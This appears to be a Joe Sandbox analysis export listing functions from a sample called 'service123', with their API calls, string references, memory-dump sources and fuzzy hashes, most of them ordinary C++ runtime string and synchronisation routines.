Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 0b65a1b57332bab1c25768360afe3b20ef3d87dfdce08b06b5ee14a97b9db437
Instruction ID: e417c48d0cde5b06bae009a96fd60f77f28a2e48dd206405f59e3271ab736464
Opcode Fuzzy Hash: 0b65a1b57332bab1c25768360afe3b20ef3d87dfdce08b06b5ee14a97b9db437
Instruction Fuzzy Hash: 6CD137B19097598FCB04DFA8C48058EBBF4EF88314F148A6AE8A4E7751D734D945CF92

Function 6C390F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C390FD5

Strings

basic_string::append, xrefs: 6C39104D, 6C391059, 6C39114C, 6C39120C

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 29ca69505716014797e8a654bd1508ef50ec2704cc81fa28b6943df3601f14c5
Instruction ID: cdfaca4b81ce75711ccfc17d55952e2b06a8b7b7d77377566c8a4b245a854731
Opcode Fuzzy Hash: 29ca69505716014797e8a654bd1508ef50ec2704cc81fa28b6943df3601f14c5
Instruction Fuzzy Hash: D1A179B5A042049FCB00EF69C58469EFBF4FF89314F018969E8989B744E735E849CF92

Function 6C32B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C32997F), ref: 6C32B336
memcpy.MSVCRT(?,?,?,?,?,?,6C32997F), ref: 6C32B3A1
memcpy.MSVCRT(00000000,?,?,6C32997F), ref: 6C32B3E8

Strings

basic_string::assign, xrefs: 6C32B403

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 2c311485ea01b23b5407273ef2fd6902992f4eb1f6445b2262e99d41e2d85419
Instruction ID: a53cc426964597e30545310d6e4a13d996e0ffb3cc12aeddafcc7e94b0fad198
Opcode Fuzzy Hash: 2c311485ea01b23b5407273ef2fd6902992f4eb1f6445b2262e99d41e2d85419
Instruction Fuzzy Hash: 10518A71B0A6118BDB14DF28C48461AF7F5FF9630CB10866DE5868B714E736E805CF82

Function 6C334410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C334471
memcpy.MSVCRT ref: 6C3344DF
memcpy.MSVCRT ref: 6C334518

Strings

basic_string::assign, xrefs: 6C334534

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 9ba3a94a7a450666551b932fb816bb7b14485fd68339deadf48b10476431e184
Instruction ID: a42a0e4a4162f99a3009c3c2f914ce0145070ae37f5cd066ed589fadf3873014
Opcode Fuzzy Hash: 9ba3a94a7a450666551b932fb816bb7b14485fd68339deadf48b10476431e184
Instruction Fuzzy Hash: 0E51B171B0A2618FD700DF28D08461AFFE5BF96319F11956DE4888B718E732D805CF92

Function 6C2EE980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EE9AA
wcslen.MSVCRT ref: 6C2EEA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C2EE9E2, 6C2EEA52, 6C2EEAC2

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: fa6d7b3c7f9fc633cd6b55b7be6c9d7709a9ee02dfb5a0122a35de9e50c24633
Instruction ID: 455ae8c208670c74e8f43d5feb7abbbe2c9eb991eb42ca2b7a3e084c1476ef1e
Opcode Fuzzy Hash: fa6d7b3c7f9fc633cd6b55b7be6c9d7709a9ee02dfb5a0122a35de9e50c24633
Instruction Fuzzy Hash: 7041AFF1A056148FCB00FF2CD48188ABBE0BF59214F56497DE9859B718E331E999CBD2

Function 6C2EE581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EE5AD
strlen.MSVCRT ref: 6C2EE5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C2EE5CF, 6C2EE61F, 6C2EE66F

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 4bde5b1e855f365c068ccc52c4c9ff649a8e5b0d9d5340147439d02eb2920e0a
Instruction ID: aab22656cd0291e7f74b5104b7c7143409771db94f74eb2210eb56bc05bb737d
Opcode Fuzzy Hash: 4bde5b1e855f365c068ccc52c4c9ff649a8e5b0d9d5340147439d02eb2920e0a
Instruction Fuzzy Hash: 583180B5A156158FCB00BF28C48188ABBE4FF19618F4649ADECC89B711D331EC59CF92

Function 6C2D9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C2D96B2
MultiByteToWideChar.KERNEL32 ref: 6C2D96F5

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 2109e89e7e24f40e48dcb041f95988417e3bb03bc3e0b04b4007407971dcf8cc
Instruction ID: 8f3fc9015eabd4144036f63e9e2f902d710af9979c0e5c4d8610bbd08f9ebe34
Opcode Fuzzy Hash: 2109e89e7e24f40e48dcb041f95988417e3bb03bc3e0b04b4007407971dcf8cc
Instruction Fuzzy Hash: 363138B05093468FE700EF29D09428ABBF0BF9A319F11892DF8D487350D776E858CB42

Function 006F7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 006F7C92
MultiByteToWideChar.KERNEL32 ref: 006F7CD5

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 653283ce0ec71e8c91c3bf879431ecc6cf1b8524ed35126bd5911328783039d1
Instruction ID: 3535d2d9871c39cdf1a3964ab8ebd9b0aaf8bda7bdce709505a737acc20fcaa6
Opcode Fuzzy Hash: 653283ce0ec71e8c91c3bf879431ecc6cf1b8524ed35126bd5911328783039d1
Instruction Fuzzy Hash: F63102B050C3418FD710DF29D5846AABBF1BF86314F44896EEA948B350E7B6D849CB92

Function 6C2CF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2CF5C1

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 62dd3b8e43ccd55df9127826b1e2ede14e871eb32de06beb38ae54dd7e774bca
Instruction ID: cdc7bcb6e7c009c3191077b67a24eac45246516b465fe873ff4a3441f4320f2c
Opcode Fuzzy Hash: 62dd3b8e43ccd55df9127826b1e2ede14e871eb32de06beb38ae54dd7e774bca
Instruction Fuzzy Hash: E8415870B093058FDBA0DF29D5847877BF8BB4A318F14821AED684B355E331D84ACB92

Function 6C2CF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2CF751

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 50ad54058e7581c9f911de490ecd3535cccc1e96142cf05b96f3d6ade93f61b8
Instruction ID: 5019e3b15ec37e62f6574a97cf4d23140c9b799ddf96031abaef30d514341670
Opcode Fuzzy Hash: 50ad54058e7581c9f911de490ecd3535cccc1e96142cf05b96f3d6ade93f61b8
Instruction Fuzzy Hash: 1C314770B053058FDB90DF29C5887877BF8BB4A319F15825AEC584B795E331D809CB92

Function 6C2CF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2CFA72
CreateSemaphoreW.KERNEL32 ref: 6C2CFAB7
WaitForSingleObject.KERNEL32 ref: 6C2CFB00

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 8fdf5813173d5692aee6a64311d81fa0330d148798188e46838c4bca925af27b
Instruction ID: 215923c9e4a2faee6744c1e57196ad972351162c8824595b1cad33c207fddcc9
Opcode Fuzzy Hash: 8fdf5813173d5692aee6a64311d81fa0330d148798188e46838c4bca925af27b
Instruction Fuzzy Hash: 8B31F8707053058FDBA0DF29C584787BBF8BB4A319F14865AE85887381D335D94A8B92

Function 6C2CFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2CFBF2
CreateSemaphoreW.KERNEL32 ref: 6C2CFC37
WaitForSingleObject.KERNEL32 ref: 6C2CFC80

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: a354a920ca959ab6c5a0e57d05a0641b8a25239edf328623079240fff023c7fb
Instruction ID: b0184663dd8320615431d487912311b8c2a9b7ca4fede12e91452c511b3bdf6f
Opcode Fuzzy Hash: a354a920ca959ab6c5a0e57d05a0641b8a25239edf328623079240fff023c7fb
Instruction Fuzzy Hash: FB3108707093058FDB90DF29C6887877BF8BB4A359F10825AEC548B385D335D949CB92

Function 6C2C55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2C72FE

Strings

this, xrefs: 6C2C55B3
{parm#, xrefs: 6C2C72D9
}, xrefs: 6C2C7392

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 05a164c3807735e0cdaeecd109587791fe34d18e2bbbc482fcdcecb7f6c3bced
Instruction ID: 35d250dbe053b12d82c86ec55a1332bbdff2224ee4ba39f9e204db8e2fc3fec5
Opcode Fuzzy Hash: 05a164c3807735e0cdaeecd109587791fe34d18e2bbbc482fcdcecb7f6c3bced
Instruction Fuzzy Hash: B0219F7160D342CFD7519F18C0803A9BBA1AF91704F1886BEECD84FA0BC77595859BA3

Function 006F1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 006F106B
__p__fmode.MSVCRT ref: 006F1070
__p__commode.MSVCRT ref: 006F107D

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: c3247580e9276b83adbfd94d865bc7660718acefb05466e7dbc8ebfec6964d9f
Instruction ID: 07a1f7e9ba8d59a2236d353c088bee0f0e8a3c77678975a9bb4d3f3c83317112
Opcode Fuzzy Hash: c3247580e9276b83adbfd94d865bc7660718acefb05466e7dbc8ebfec6964d9f
Instruction Fuzzy Hash: 13219D7050420ACBC314AF24C8053B933A3BB02384F94956CD6188F366EF7BE8C6DB99

Function 6C339F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C339F85
strlen.MSVCRT ref: 6C339F8F
memcpy.MSVCRT ref: 6C339FB8
setlocale.MSVCRT ref: 6C339FCC

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: d20db91859065401611d3f06cc8a52d6086d96f8660b1316cf54bb75fdce54d6
Instruction ID: f0aba5976c9730b1c6c67072b899f5b9681db681993a9f62f02f97bb0839fa3c
Opcode Fuzzy Hash: d20db91859065401611d3f06cc8a52d6086d96f8660b1316cf54bb75fdce54d6
Instruction Fuzzy Hash: D0F034B65093209AD3007F6894553AFBAE4EF90688F428C5DE8C88B711EB749858CB92

Function 6C2D4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C2D4C66
@, xrefs: 6C2D4D17

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: c2ac4bef234982e2ada0003ee82604aa8b93dde6a21d835be66737c70858fe8f
Instruction ID: baeda94e57fe219654013589d86bbea611c82f8b6296f491a924c50f0f409a85
Opcode Fuzzy Hash: c2ac4bef234982e2ada0003ee82604aa8b93dde6a21d835be66737c70858fe8f
Instruction Fuzzy Hash: A7A1A07160C39A8BD720CF24D09079ABBE1BBA1309F26862DECD847741D774F549CB82

Function 006F4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 006F4596
@, xrefs: 006F4647

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: dddad0fbeec7318131b9c9f293b51a1e8f97273b5a14f0b837dd0e72459b2e27
Instruction ID: 377dcb2eba4f9fe2862316bfdacc2e811582ca3b6c7151099597726c67022823
Opcode Fuzzy Hash: dddad0fbeec7318131b9c9f293b51a1e8f97273b5a14f0b837dd0e72459b2e27
Instruction Fuzzy Hash: 4BA18C715083998BD720DF24C0903BBBBE2BF85314F148A1DEAD897746DB35D94ADB82

Function 6C2D52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2D548E

Part of subcall function 6C2D2F00: fputc.MSVCRT ref: 6C2D2FC8

Strings

@, xrefs: 6C2D4D17
(null), xrefs: 6C2D52F7

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 85e28e02a7ef352c5095e785e0063cff6d5a9945ce9b9bf2ccd535bb52a474bc
Instruction ID: 2543d44f7d750793bca93df0c57c3a96b324aa13d28de5e87c19ee67931c5cc5
Opcode Fuzzy Hash: 85e28e02a7ef352c5095e785e0063cff6d5a9945ce9b9bf2ccd535bb52a474bc
Instruction Fuzzy Hash: 22919F7160C35A8BD7218F24D09079ABBE1BF95309F168A2DECD887781D775F909CB82

Function 006F4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 006F4DBE

Part of subcall function 006F2830: fputc.MSVCRT ref: 006F28F8

Strings

(null), xrefs: 006F4C27
@, xrefs: 006F4647

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: aff024f608e5eeb165d421d57a1c61760e134bd6f3262a3b66ce4bb20ae5ba52
Instruction ID: 7198c633037defa503f25de7111cae1ad8e9dfc8a144a6247695b8cd81953e05
Opcode Fuzzy Hash: aff024f608e5eeb165d421d57a1c61760e134bd6f3262a3b66ce4bb20ae5ba52
Instruction Fuzzy Hash: 07918F316083598BD7219F24C0903BBBBE3BF85714F148A1DDAD897742DB35D94ADB82

